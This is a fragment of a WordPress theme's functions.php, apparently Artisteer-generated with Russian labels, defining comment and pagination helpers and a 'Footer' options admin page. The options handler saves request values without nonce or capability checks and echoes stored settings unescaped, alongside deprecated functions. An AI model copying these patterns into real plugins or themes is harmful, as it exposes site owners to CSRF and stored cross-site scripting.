if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
